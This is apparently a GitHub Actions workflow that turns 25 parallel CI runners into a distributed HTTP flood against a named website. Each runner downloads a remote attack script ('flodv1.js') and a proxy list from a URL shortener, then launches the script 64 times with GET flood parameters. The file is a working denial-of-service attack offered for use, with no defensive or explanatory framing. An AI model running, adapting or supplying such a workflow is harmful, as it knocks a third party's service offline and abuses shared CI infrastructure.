name: Ubuntu VDS 50 saniye tornad

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/KfYf3/flodv1.js
          wget https://curl.by/LM2U8/proxies.txt
          npm i hpack
          chmod +x flodv1.js
          PIDS=()
          for i in {1..64}; do
            timeout 60 node flodv1.js GET https://hexbear.xyz/ 60 9 90 fres.txt --full --query 3
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 60
        
      - name: OK !
        run: sudo reboot
